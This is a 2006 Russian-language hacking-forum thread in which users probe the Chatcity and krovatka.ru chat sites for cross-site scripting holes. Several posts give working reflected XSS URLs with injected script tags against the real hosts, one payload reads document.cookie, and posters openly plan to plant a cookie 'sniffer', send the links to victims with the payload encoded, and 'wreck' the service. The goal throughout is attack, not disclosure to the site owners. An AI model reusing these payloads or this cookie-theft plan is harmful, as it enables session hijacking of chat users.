Чаты Чатсити

Discussion in 'Веб-уязвимости' started by .Slip, 11 May 2006.

  1. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Дыры в Чатсити

    Ходил по чатсити, зашёл в какой то татарский чат. Начал там пробовать что либо сделать, без особой надежды на успех.. И вот кое что нашёл, когда делается запрос на приват, человек который предлогал приват ушёл, я потом нажал вход в приват и вылезло это:
    _http://www.38557.chatcity.ru/kpobatka?f=45&newwin=1&id2=9919&id=6595wr35Ou9b&c=38557
    (это только тогда, когда ты находишься в чате)
    Вылезло окно, мне написали: *Этот человек упал слишком надолго и ему теперь надо перезайти.*
    Потом я вышел из чата, и попробовал зайти по тому же адресу:
    _http://www.38557.chatcity.ru/kpobatka?f=45&newwin=1&id2=9919&id=6595wr35Ou9b&c=38557
    Мне написали: *Сообщите об ошибке / Send bug report*
    Эта надпись была в виде ссылки. Я её открыл, адрес был такой:
    _http://www.38557.chatcity.ru/bug/?err=NoChMap(check_user_ids)&www.38557.chatcity.ru&f=45&newwin=1&id2=9919&id=6595wr35Ou9b&c=38557

    И там уже появилось окно, в нём была описана причина произошедшей ошибки..
    Я конечно не говорю что это взлом или уязвимость, но такая череда мне кажется странной.. Щас пробую вызвать алерт.. Если что то получится, обязательно отпишусь.
     
    #1 .Slip, 11 May 2006
    Last edited: 11 May 2006
    4 people like this.
  2. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Вот и на "бездырочном" чатсити я вызвал алерт) Теперь пользуйтесь пока не прикрыли)
    _http://www.38557.chatcity.ru/bug/?err=NoChMap(check_user_ids)&http://www.38557.chatcity.ru&f=45&newwin=1&id2=9919&id=6595wr35ou9b&c=38557/"><script>alert('Yo')</script>
    Хе) Вот и вам всё крутое чатсити)
    _http://img521.imageshack.us/img521/2051/alert7wm.jpg
     
    #2 .Slip, 11 May 2006
    Last edited: 12 May 2006
    1 person likes this.
  3. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    PS если есть необходимость, просто заменяйте id чата (у этого айди 38557) и всё:)
     
  4. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    Вот нарыл прикольно )

    <input type=hidden name=err value="IllegalChannel(get_ch)">
    <input type=hidden name=browser value="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)">
    <input type=hidden name=addr value="0.0.0.0.0">
    <input type=hidden name=via value="">
    <input type=hidden name=referer value="http://1498.chatcity.ru/kpobatka?f=rrtert">
    <input type=hidden name=args value="1498.chatcity.ru&f=rrtert">

    Зачем Админ не сделал скрипт простой отправки ? мне так кажится можна им воспользоваться, если сохранить это у себя на машине.
     
    1 person likes this.
  5. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    В общем, теперь чатсити не неломаемое:) Разснесут его в щепки, имхо) Если дыры не прикроют
     
  6. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    попробуйте сначала кукисы получить через алертик (xss), тогда сразу видно будет что что-то стоящее нашли))))
     
  7. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Кстати да, Rebz верно говоришь) Вчера небыло времени ещё тестить на куки.. Сегодня попробую)
    Главное что хоть что то есть)
     
  8. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Вот п3.14.дец.. Сниффер не получается воткнуть..( Ну то есть втыкается он, но куки не приходят..(
    Буду ещё искать дырки, люди, помогайте) Вместе мы снесём чатсити:)
     
  9. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Так-с.. Нашёл ещё одну..
    _http://www.38557.chatcity.ru/kpobatka?f=45&newwin=1&id2=9919&id=6595wr35Ou9b&c=38557"><script>alert('Yo')</script>
    Сначало выпадает окошко о прекращении связи и с вопросом об перезаходе,
    (_http://img62.imageshack.us/img62/2659/quest4jr.jpg) нажимаете ОТМЕНА, и сразу же запускается алерт.. И опять же, как и в том случае, "> "вшивается" в тело страницы..
    _http://img472.imageshack.us/img472/416/alert20gy.jpg
     
  10. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Увидел тему пошёл искать уязвимости. Как найду тут отпишусь.
     
  11. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    Автор, вставляй не alert('text'), а alert(document.cookie);.. хоть пассивную xss-ку найти можно..

    но пока чё-то не получается.. если вот так взять..
    можно попробовать залогиниться и ссылку кому-нить дать затестить..
     
  12. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Rebz, если алерт проходит, то уже значит дыра есть, а раз дыра, то 80-90% что там xss..

    PS у меня ник есть) Или называй слип, меня так все называют)
     
    #12 .Slip, 12 May 2006
    Last edited: 13 May 2006
  13. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    Ты сунул комунить , на съедение ? если что не забудь закодировать в 16 битном.
     
  14. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    _http://www.38557.chatcity.ru/bug/?err=NoChMap(check_user_ids)&http://www.38557.chatcity.ru&f=45&newwin=1&id2=9919&id=6595wr35ou9b&c=38557/"><script>alert('Yo')</script>
    Вот эту давал себе на съедение) Не приходят куки..
    А с этой не пробовал:
    _http://www.38557.chatcity.ru/kpobatka?f=45&newwin=1&id2=9919&id=6595wr35Ou9b&c=38557"><script>alert('Yo')</script>
    И ещё одно, со второй дыркой (см. выше) интересная вещь.. Когда заходишь, ну пишет о прекращении связи, нажимаешь отмену, выпадает алерт, потом нажимаешь на ссылку *Сообщить об ошибке* и на открывающейся странице, алерт уже выпадает автоматом) Хотя в адресной строке его нету) Ну и на открывшейся странице, можно просмотреть свой айпишник и т.д.)
     
    #14 .Slip, 13 May 2006
    Last edited: 13 May 2006
  15. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Ну что, люди, кто нибудь что нить интересное нашёл?
     
  16. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    давай уже из алертов xss делай... а то на полпути остановился..
     
  17. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Там есть xss, только сниффер не получается вогнать((
     
  18. Антошка2003

    Антошка2003 Elder - Старейшина

    Joined:
    3 Apr 2005
    Messages:
    534
    Likes Received:
    66
    Reputations:
    49
    может пригодиться, ещё один алерт
    _http://romashka.krovatka.ru/k?f=60&id=6226VLpq63TU&c=8&st=</script><script>alert(document.cookie)</script><h1>xss%20by%20Antoshka2003</h1&nc=2162
     
  19. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    Ну, вообще-то сниффер не всегда можно впарить...например ссылка на сниффер заключается в кавычки, а на сайте стоит на них филтр...получается, что алерт вылетает на раз, а толку-ноль.
     
  20. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Ещё небольшое добавление по чатсити..
    Во первых расшарил форму входа в чат, так, на всякий случай, может кому то пригодится:
    Code:
    <form action="http://38557.chatcity.ru/" method=post>
    <input type=hidden name="c" value="38557">
    Имя: <input name="mn" maxlength=30>
    Пароль: <input type=password name="pass"> (для зарегистрированных)
    <input type=submit value=" OK ">
    </form>
    И ещё одна xss:
    _http://www.38557.chatcity.ru/people/pp10.cgi?c=38557&str=%3Cscript%3Ealert%28%27Yo%27%29%3C%2Fscript%3E
    Они лолы, на самом видном месте.. На поиске какой либо анкеты..
     
    #20 .Slip, 15 May 2006
    Last edited: 15 May 2006